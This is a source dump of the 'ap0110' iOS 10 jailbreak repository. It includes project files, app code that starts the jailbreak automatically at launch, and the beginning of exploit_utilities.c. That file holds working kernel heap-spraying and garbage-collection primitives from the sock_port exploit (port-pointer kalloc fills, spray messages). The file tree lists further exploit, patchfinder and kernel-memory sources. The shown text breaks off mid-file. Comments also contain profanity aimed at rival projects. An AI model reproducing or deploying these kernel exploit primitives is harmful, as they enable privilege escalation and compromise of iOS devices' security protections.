├── .gitignore
├── Athenus.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ └── xcuserdata
│ │ └── spv.xcuserdatad
│ │ └── WorkspaceSettings.xcsettings
└── xcuserdata
│ └── spv.xcuserdatad
│ └── xcschemes
│ ├── genesys.xcscheme
│ └── xcschememanagement.plist
├── Athenus
├── Ap0110-1024.png
├── AppDelegate.h
├── AppDelegate.m
├── Assets.xcassets
│ ├── AppIcon.appiconset
│ │ ├── Ap0110-1024.png
│ │ ├── Ap0110-20.png
│ │ ├── Ap0110-20@2x.png
│ │ ├── Ap0110-20@3x.png
│ │ ├── Ap0110-29.png
│ │ ├── Ap0110-29@2x.png
│ │ ├── Ap0110-29@3x.png
│ │ ├── Ap0110-40.png
│ │ ├── Ap0110-40@2x.png
│ │ ├── Ap0110-40@3x.png
│ │ ├── Ap0110-60@2x.png
│ │ ├── Ap0110-60@3x.png
│ │ ├── Ap0110-76.png
│ │ ├── Ap0110-76@2x.png
│ │ ├── Ap0110-83.5@2x.png
│ │ └── Contents.json
│ └── Contents.json
├── Base.lproj
│ ├── LaunchScreen.storyboard
│ └── Main.storyboard
├── Info.plist
├── ViewController.h
├── ViewController.m
├── common.h
├── config.h
├── exploit_utilities.c
├── exploit_utilities.h
├── fuckyou.png
├── iosurface.c
├── iosurface.h
├── jailbreak.h
├── jailbreak.mm
├── jbresources
│ ├── Cydia-10.tar
│ ├── launchctl
│ ├── python.tar
│ └── tar
├── kernel_memory.c
├── kernel_memory.h
├── kutil.h
├── kutil.m
├── libs
│ ├── libimg4tool.a
│ ├── libplist++.a
│ └── libplist.a
├── main.m
├── offsets.h
├── offsets.m
├── offsets.mm
├── patchfinder64.c
├── patchfinder64.h
├── pte_stuff_64.h
├── sbops.h
├── sock_port_exploit.c
├── sock_port_exploit.h
├── sugondesenuts.h
├── untethered.h
└── untethered.m
├── IOKit.framework
├── Headers
│ ├── IOKitKeys.h
│ ├── IOKitLib.h
│ ├── IOReturn.h
│ ├── IOTypes.h
│ └── OSMessageNotification.h
├── IOKit.tbd
└── Versions
│ ├── A
│ └── IOKit.tbd
│ └── Current
├── LICENSE
├── README.md
├── build.sh
├── img4tool
├── all_img4tool.h
├── img4.h
├── img4tool.h
└── lzssdec.h
├── liboffsetfinder32
├── img3dec.cpp
├── img3dec.hpp
├── lzssdec.cpp
├── lzssdec.hpp
├── offsetfinder32.cpp
├── offsetfinder32.hpp
├── patchfinder32.c
└── patchfinder32.h
├── liboffsetfinder64
├── all_liboffsetfinder.hpp
├── common.h
├── exception.cpp
├── exception.hpp
├── insn.cpp
├── insn.hpp
├── liboffsetfinder64.cpp
├── liboffsetfinder64.hpp
├── patch.cpp
└── patch.hpp
└── plist
├── Array.hpp
├── Boolean.hpp
├── Data.hpp
├── Date.hpp
├── Dictionary.hpp
├── Integer.hpp
├── Key.hpp
├── Node.hpp
├── Real.hpp
├── String.hpp
├── Structure.hpp
├── Uid.hpp
├── plist++.hpp
└── plist.h
/.gitignore:
--------------------------------------------------------------------------------
1 | **/.DS_Store
2 | **/._.DS_Store
3 | Payload.ipa
4 | Payload
5 | build
6 |
--------------------------------------------------------------------------------
/Athenus.xcodeproj/project.xcworkspace/xcuserdata/spv.xcuserdatad/WorkspaceSettings.xcsettings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | BuildLocationStyle
6 | UseAppPreferences
7 | CustomBuildLocationType
8 | RelativeToDerivedData
9 | DerivedDataLocationStyle
10 | Default
11 | IssueFilterStyle
12 | ShowActiveSchemeOnly
13 | LiveSourceIssuesEnabled
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Athenus.xcodeproj/xcuserdata/spv.xcuserdatad/xcschemes/genesys.xcscheme:
--------------------------------------------------------------------------------
1 |
2 |
5 |
8 |
9 |
15 |
21 |
22 |
23 |
24 |
25 |
30 |
31 |
33 |
39 |
40 |
41 |
43 |
49 |
50 |
51 |
52 |
53 |
59 |
60 |
61 |
62 |
63 |
64 |
74 |
76 |
82 |
83 |
84 |
85 |
86 |
87 |
93 |
95 |
101 |
102 |
103 |
104 |
106 |
107 |
110 |
111 |
112 |
--------------------------------------------------------------------------------
/Athenus.xcodeproj/xcuserdata/spv.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | genesys.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 | SuppressBuildableAutocreation
14 |
15 | 75DC305324B4CB00009152F2
16 |
17 | primary
18 |
19 |
20 | 75DC306C24B4CB01009152F2
21 |
22 | primary
23 |
24 |
25 | 75DC307724B4CB01009152F2
26 |
27 | primary
28 |
29 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/Athenus/Ap0110-1024.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Ap0110-1024.png
--------------------------------------------------------------------------------
/Athenus/AppDelegate.h:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #import
17 |
18 | @interface AppDelegate : UIResponder
19 |
20 | @property (strong, nonatomic) UIWindow *window;
21 |
22 |
23 | @end
24 |
25 |
--------------------------------------------------------------------------------
/Athenus/AppDelegate.m:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #import "AppDelegate.h"
17 | #include "untethered.h"
18 | #include "config.h"
19 | #include "jailbreak.h"
20 | #include
21 | #include
22 | #include
23 | #include
24 | #include
25 |
26 | @interface AppDelegate ()
27 |
28 | @end
29 |
30 | @implementation AppDelegate
31 |
32 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
33 | fun(0,0);
34 | return YES;
35 | }
36 |
37 |
38 | - (void)applicationWillResignActive:(UIApplication *)application {
39 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
40 | // Use this method to pause ongoing tasks, disable timers, and throttle down OpenGL ES frame rates. Games should use this method to pause the game.
41 | }
42 |
43 | - (void)applicationDidEnterBackground:(UIApplication *)application {
44 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
45 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
46 | }
47 |
48 | - (void)applicationWillEnterForeground:(UIApplication *)application {
49 | // Called as part of the transition from the background to the inactive state; here you can undo many of the changes made on entering the background.
50 | }
51 |
52 | - (void)applicationDidBecomeActive:(UIApplication *)application {
53 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
54 | }
55 |
56 | - (void)applicationWillTerminate:(UIApplication *)application {
57 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
58 | }
59 |
60 | @end
61 |
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-1024.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-1024.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@2x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-20@3x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@2x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-29@3x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@2x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-40@3x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@2x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-60@3x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-76@2x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-83.5@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/Assets.xcassets/AppIcon.appiconset/Ap0110-83.5@2x.png
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "size" : "20x20",
5 | "idiom": "iphone",
6 | "filename" : "Ap0110-20@2x.png",
7 | "scale": "2x"
8 | },
9 | {
10 | "size" : "20x20",
11 | "idiom": "iphone",
12 | "filename" : "Ap0110-20@3x.png",
13 | "scale": "3x"
14 | },
15 | {
16 | "size" : "20x20",
17 | "idiom": "ipad",
18 | "filename" : "Ap0110-20.png",
19 | "scale": "1x"
20 | },
21 | {
22 | "size" : "20x20",
23 | "idiom": "ipad",
24 | "filename" : "Ap0110-20@2x.png",
25 | "scale": "2x"
26 | },
27 | {
28 | "size" : "29x29",
29 | "idiom" : "iphone",
30 | "filename" : "Ap0110-29@2x.png",
31 | "scale" : "2x"
32 | },
33 | {
34 | "size" : "29x29",
35 | "idiom" : "iphone",
36 | "filename" : "Ap0110-29@3x.png",
37 | "scale" : "3x"
38 | },
39 | {
40 | "size" : "40x40",
41 | "idiom" : "iphone",
42 | "filename" : "Ap0110-40@2x.png",
43 | "scale" : "2x"
44 | },
45 | {
46 | "size" : "40x40",
47 | "idiom" : "iphone",
48 | "filename" : "Ap0110-40@3x.png",
49 | "scale" : "3x"
50 | },
51 | {
52 | "size" : "60x60",
53 | "idiom" : "iphone",
54 | "filename" : "Ap0110-60@2x.png",
55 | "scale" : "2x"
56 | },
57 | {
58 | "size" : "60x60",
59 | "idiom" : "iphone",
60 | "filename" : "Ap0110-60@3x.png",
61 | "scale" : "3x"
62 | },
63 | {
64 | "size" : "29x29",
65 | "idiom" : "ipad",
66 | "filename" : "Ap0110-29.png",
67 | "scale" : "1x"
68 | },
69 | {
70 | "size" : "29x29",
71 | "idiom" : "ipad",
72 | "filename" : "Ap0110-29@2x.png",
73 | "scale" : "2x"
74 | },
75 | {
76 | "size" : "40x40",
77 | "idiom" : "ipad",
78 | "filename" : "Ap0110-40.png",
79 | "scale" : "1x"
80 | },
81 | {
82 | "size" : "40x40",
83 | "idiom" : "ipad",
84 | "filename" : "Ap0110-40@2x.png",
85 | "scale" : "2x"
86 | },
87 | {
88 | "size" : "76x76",
89 | "idiom" : "ipad",
90 | "filename" : "Ap0110-76.png",
91 | "scale" : "1x"
92 | },
93 | {
94 | "size" : "76x76",
95 | "idiom" : "ipad",
96 | "filename" : "Ap0110-76@2x.png",
97 | "scale" : "2x"
98 | },
99 | {
100 | "size" : "83.5x83.5",
101 | "idiom" : "ipad",
102 | "filename" : "Ap0110-83.5@2x.png",
103 | "scale" : "2x"
104 | },
105 | {
106 | "size" : "1024x1024",
107 | "idiom" : "ios-marketing",
108 | "filename" : "Ap0110-1024.png",
109 | "scale" : "1x"
110 | }
111 | ],
112 | "info" : {
113 | "version" : 1,
114 | "author" : "xcode"
115 | }
116 | }
117 |
--------------------------------------------------------------------------------
/Athenus/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "version" : 1,
4 | "author" : "xcode"
5 | }
6 | }
--------------------------------------------------------------------------------
/Athenus/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/Athenus/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | en
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.1b3
19 | CFBundleSignature
20 | ????
21 | CFBundleVersion
22 | 64
23 | LSRequiresIPhoneOS
24 |
25 | UIBackgroundModes
26 |
27 | audio
28 | voip
29 |
30 | UIFileSharingEnabled
31 |
32 | UILaunchStoryboardName
33 | LaunchScreen
34 | UIMainStoryboardFile
35 | Main
36 | UIRequiredDeviceCapabilities
37 |
38 | armv7
39 |
40 | UISupportedInterfaceOrientations
41 |
42 | UIInterfaceOrientationPortrait
43 |
44 | UISupportedInterfaceOrientations~ipad
45 |
46 | UIInterfaceOrientationPortrait
47 | UIInterfaceOrientationPortraitUpsideDown
48 | UIInterfaceOrientationLandscapeLeft
49 | UIInterfaceOrientationLandscapeRight
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/Athenus/ViewController.h:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #import
17 |
18 | @interface ViewController : UIViewController
19 |
20 |
21 | @end
22 |
23 |
--------------------------------------------------------------------------------
/Athenus/ViewController.m:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #import "ViewController.h"
17 | #include "jailbreak.h"
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 | @interface ViewController ()
24 | @property (weak, nonatomic) IBOutlet UIButton *butoon;
25 | @property (weak, nonatomic) IBOutlet UISwitch *tweakswitch;
26 | @property (weak, nonatomic) IBOutlet UILabel *tweaklabel;
27 | @property (weak, nonatomic) IBOutlet UISwitch *sshswitch;
28 | @property (weak, nonatomic) IBOutlet UILabel *sshlabel;
29 | @property (weak, nonatomic) IBOutlet UISwitch *jailbreakswitch;
30 | @property (weak, nonatomic) IBOutlet UILabel *jailbreaklabel;
31 |
32 | @end
33 |
34 | @implementation ViewController
35 |
36 | extern int viewDidExecute;
37 | - (IBAction)jelbrek:(id)sender {
38 | struct utsname name;
39 | uname(&name);
40 | if (!strstr(name.version, "MarijuanARM")){
41 | usleep(USEC_PER_SEC/100);
42 |
43 | dispatch_async(jailbreak_queue , ^{
44 | jailbreak();
45 | });
46 | }
47 | }
48 |
49 | - (void)tweakChanged:(id)sender {
50 | BOOL tweaksEnabled = [sender isOn];
51 | [[NSUserDefaults standardUserDefaults] setBool:tweaksEnabled forKey:@"tweaksEnabled"];
52 | }
53 |
54 | - (void)sshChanged:(id)sender {
55 | BOOL sshEnabled = [sender isOn];
56 | [[NSUserDefaults standardUserDefaults] setBool:sshEnabled forKey:@"sshEnabled"];
57 | }
58 |
59 | - (void)jailbreakChanged:(id)sender {
60 | BOOL jailbreakEnabled = [sender isOn];
61 | [[NSUserDefaults standardUserDefaults] setBool:jailbreakEnabled forKey:@"jailbreakEnabled"];
62 | }
63 |
64 |
65 |
66 | - (void)viewDidLoad {
67 | [super viewDidLoad];
68 | // Do any additional setup after loading the view, typically from a nib.
69 | if (
70 | [[NSFileManager defaultManager]fileExistsAtPath:@"/Applications/Cydia.app/"]) {
71 | _butoon.enabled = false;
72 | _butoon.hidden = true;
73 |
74 | if ([[NSUserDefaults standardUserDefaults] boolForKey:@"notfirst"]) {
75 | [_tweakswitch setOn:([[NSUserDefaults standardUserDefaults] boolForKey:@"tweaksEnabled"])];
76 | [_sshswitch setOn:([[NSUserDefaults standardUserDefaults] boolForKey:@"sshEnabled"])];
77 | [_jailbreakswitch setOn:([[NSUserDefaults standardUserDefaults] boolForKey:@"jailbreakEnabled"])];
78 | }
79 | else {
80 | UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"README"
81 | message:@"The jailbreak switch is currently disabled due to a bug, therefore it is stuck in the on position for the time being."
82 | delegate:self
83 | cancelButtonTitle:@"OK"
84 | otherButtonTitles:nil];
85 | [alert show];
86 | }
87 |
88 |
89 | _tweakswitch.hidden = false;
90 | _tweaklabel.hidden = false;
91 | _sshswitch.hidden = false;
92 | _sshlabel.hidden = false;
93 | _jailbreakswitch.hidden = false;
94 | _jailbreaklabel.hidden = false;
95 |
96 | [_tweakswitch addTarget:self action:@selector(tweakChanged:) forControlEvents:UIControlEventValueChanged];
97 | [_sshswitch addTarget:self action:@selector(sshChanged:) forControlEvents:UIControlEventValueChanged];
98 | [_jailbreakswitch addTarget:self action:@selector(jailbreakChanged:) forControlEvents:UIControlEventValueChanged];
99 |
100 |
101 | [_butoon setTitle:@"jailbroken" forState:UIControlStateNormal];
102 | [[NSUserDefaults standardUserDefaults] setBool:true forKey:@"notfirst"];
103 |
104 | }
105 | /* now unnecessary */
106 | //[[UIApplication sharedApplication] registerUserNotificationSettings:[UIUserNotificationSettings settingsForTypes:(UIUserNotificationTypeSound | UIUserNotificationTypeAlert | UIUserNotificationTypeBadge) categories:nil]];
107 | [[UIApplication sharedApplication] registerForRemoteNotifications];
108 | NSLog(@"viewDidLoad executed");
109 | //viewDidExecute = 1;
110 | }
111 |
112 | - (void)didReceiveMemoryWarning {
113 | [super didReceiveMemoryWarning];
114 | // Dispose of any resources that can be recreated.
115 | }
116 |
117 | @end
118 |
--------------------------------------------------------------------------------
/Athenus/common.h:
--------------------------------------------------------------------------------
1 | #ifndef COMMON_H
2 | #define COMMON_H
3 |
4 | #include // uint*_t
5 | //#include
6 |
7 | #define LOG(str, args...) do { printf(str "\n", ##args); } while(0)
8 | #ifdef __LP64__
9 | # define ADDR "0x%016llx"
10 | # define MACH_HEADER_MAGIC MH_MAGIC_64
11 | # define MACH_LC_SEGMENT LC_SEGMENT_64
12 | typedef struct mach_header_64 mach_hdr_t;
13 | typedef struct segment_command_64 mach_seg_t;
14 | typedef uint64_t kptr_t;
15 | #define KERN_POINTER_VALID(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff)
16 | #else
17 | # define ADDR "0x%08x"
18 | # define MACH_HEADER_MAGIC MH_MAGIC
19 | # define MACH_LC_SEGMENT LC_SEGMENT
20 | #define KERN_POINTER_VALID(val) ((val) >= 0x80000000 && (val) != 0xffffffff)
21 | typedef struct mach_header mach_hdr_t;
22 | typedef struct segment_command mach_seg_t;
23 | typedef uint32_t kptr_t;
24 | #endif
25 | typedef struct load_command mach_lc_t;
26 |
27 | #if __cplusplus
28 | #if __arm64__
29 | #include
30 | typedef tihmstar::offsetfinder64 offsetfinder;
31 | #else //__arm64__
32 | #include
33 | typedef CR::offsetfinder32 offsetfinder;
34 | #endif //__arm64__
35 | #endif //__cplusplus
36 |
37 | #endif
38 |
--------------------------------------------------------------------------------
/Athenus/config.h:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #ifndef config_h
17 | #define config_h
18 |
19 | #define TRUE 1
20 | #define FALSE 0
21 |
22 | #endif /* config_h */
23 |
--------------------------------------------------------------------------------
/Athenus/exploit_utilities.c:
--------------------------------------------------------------------------------
1 | //
2 | // exploit_utilities.c
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #include "exploit_utilities.h"
10 | #include "iosurface.h"
11 |
12 | // from Ian Beer. make a kernel allocation with the kernel address of 'target_port', 'count' times
13 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) {
14 | mach_port_t q = MACH_PORT_NULL;
15 | kern_return_t err;
16 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
17 | if (err != KERN_SUCCESS) {
18 | printf("[-] failed to allocate port\n");
19 | return 0;
20 | }
21 |
22 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count);
23 | for (int i = 0; i < count; i++) {
24 | ports[i] = target_port;
25 | }
26 |
27 | struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));
28 |
29 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
30 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
31 | msg->hdr.msgh_remote_port = q;
32 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
33 | msg->hdr.msgh_id = 0x41414141;
34 |
35 | msg->body.msgh_descriptor_count = 1;
36 |
37 | msg->ool_ports.address = ports;
38 | msg->ool_ports.count = count;
39 | msg->ool_ports.deallocate = 0;
40 | msg->ool_ports.disposition = disposition;
41 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
42 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
43 |
44 | err = mach_msg(&msg->hdr,
45 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
46 | msg->hdr.msgh_size,
47 | 0,
48 | MACH_PORT_NULL,
49 | MACH_MSG_TIMEOUT_NONE,
50 | MACH_PORT_NULL);
51 |
52 | if (err != KERN_SUCCESS) {
53 | printf("[-] failed to send message: %s\n", mach_error_string(err));
54 | return MACH_PORT_NULL;
55 | }
56 | free(msg);
57 | free(ports);
58 |
59 | return q;
60 | }
61 |
62 | // Ian Beer
63 | size_t message_size_for_kalloc_size(size_t kalloc_size) {
64 | return ((3 * kalloc_size) / 4) - 0x74;
65 | }
66 |
67 | // Ian Beer
68 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size) {
69 | mach_port_t q = MACH_PORT_NULL;
70 | kern_return_t err;
71 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
72 | if (err != KERN_SUCCESS) {
73 | printf("[-] failed to allocate port\n");
74 | return MACH_PORT_NULL;
75 | }
76 |
77 | mach_port_limits_t limits = {0};
78 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
79 | err = mach_port_set_attributes(mach_task_self(),
80 | q,
81 | MACH_PORT_LIMITS_INFO,
82 | (mach_port_info_t)&limits,
83 | MACH_PORT_LIMITS_INFO_COUNT);
84 | if (err != KERN_SUCCESS) {
85 | printf("[-] failed to increase queue limit\n");
86 | return MACH_PORT_NULL;
87 | }
88 |
89 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;
90 | struct simple_msg *msg = (struct simple_msg *)malloc(msg_size);
91 | memset(msg, 0, sizeof(struct simple_msg));
92 | memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);
93 |
94 | for (int i = 0; i < 256; i++) {
95 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
96 | msg->hdr.msgh_size = msg_size;
97 | msg->hdr.msgh_remote_port = q;
98 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
99 | msg->hdr.msgh_id = 0x41414142;
100 |
101 | err = mach_msg(&msg->hdr,
102 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
103 | msg_size,
104 | 0,
105 | MACH_PORT_NULL,
106 | MACH_MSG_TIMEOUT_NONE,
107 | MACH_PORT_NULL);
108 |
109 | if (err != KERN_SUCCESS) {
110 | printf("[-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err));
111 | return MACH_PORT_NULL;
112 | }
113 | }
114 | free(msg);
115 |
116 | return q;
117 | }
118 |
119 | // rest is from machswap
120 | void trigger_gc() {
121 | const int gc_ports_cnt = 100;
122 | int gc_ports_max = gc_ports_cnt;
123 | mach_port_t gc_ports[gc_ports_cnt] = { 0 };
124 |
125 | uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
126 | uint8_t *body = (uint8_t*)malloc(body_size);
127 | memset(body, 0x41, body_size);
128 |
129 | for (int i = 0; i < gc_ports_cnt; i++) {
130 | uint64_t t0, t1;
131 |
132 | t0 = mach_absolute_time();
133 | gc_ports[i] = send_kalloc_message(body, body_size);
134 | t1 = mach_absolute_time();
135 |
136 | if (t1 - t0 > 1000000) {
137 | printf("[+] got gc at %d -- breaking\n", i);
138 | gc_ports_max = i;
139 | break;
140 | }
141 | }
142 |
143 | for (int i = 0; i < gc_ports_max; i++) {
144 | mach_port_destroy(mach_task_self(), gc_ports[i]);
145 | }
146 |
